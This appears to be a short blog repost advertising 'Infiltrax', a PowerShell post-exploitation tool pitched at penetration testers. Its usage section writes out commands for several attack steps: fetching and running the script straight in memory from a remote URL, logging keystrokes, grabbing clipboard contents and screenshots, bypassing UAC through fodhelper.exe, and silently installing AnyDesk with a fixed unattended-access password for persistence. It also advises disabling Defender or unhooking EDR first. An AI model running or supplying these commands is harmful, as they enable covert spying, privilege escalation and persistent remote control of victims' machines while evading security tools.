InfiltraxInfiltrax: UAC Bypass, Keylogging, and Persistent Access for Penetration Testers

by ddos ·

Infiltrax

Infiltrax is a post-exploitation reconnaissance tool for penetration testers and red teams, designed to capture screenshots, retrieve clipboard contents, log keystrokes, bypass UAC and install AnyDesk for persistent remote access.

bypass UAC

Feature

  • Screenshot Capture: Take screenshots of the entire screen and save them as PNG files.
  • Clipboard Retrieval: Access the current clipboard contents.
  • Keystroke Logging: Record keystrokes for a specified duration.
  • UAC Bypass: Bypasses UAC via fodhelper.exe
  • AnyDesk Installation: Install and configure AnyDesk with unattended access.

Use

  1. Execute directly into memory

C:\Users\Administrator\Desktop> IEX(New-Object Net.WebClient).downloadString(https://raw.githubusercontent.com/alexdhital/Infiltrax/main/Infiltrax.ps1)

  1. Get Clipboard contents

C:\Users\Administrator\Desktop> Invoke-Clipboard

  1. Take desktop screenshot and save into certain location

C:\Users\Administrator\Desktop> Invoke-Screenshot Path C:\Windows\Tasks\

  1. Capture user keystrokes and save in a file

C:\Users\Administrator\Desktop> Invoke-KeyStrokeCapture DurationInSeconds 30 OutputPath C:\Users\Vlex\Desktop\keystrokes.txt

  1. Bypass UAC to run any program in elevated context. Default program powershell.exe

    This function is taken from https://gist.github.com/netbiosX/a114f8822eb20b115e33db55deee6692 all credit goes to netbiosX :). Spawnning cmd.exe or powersell.exe from script gets caught by behavioural detection disable defender or unhook EDR first.

C:\Users\Vlex\Desktop> Invoke-FodHelperBypass program calc.exe

  1. Installs anydesk silently, sets up unattended access and gets remote id (Requires Administrative Privilege)

C:\Users\Administrator\Desktop> Invoke-AnyDeskInstall InstallPath C:\Users\Alex\AppData\Local\AnyDesk Password Unattended123!

Source: https://github.com/alexdhital/

Tags: bypass UACInfiltrax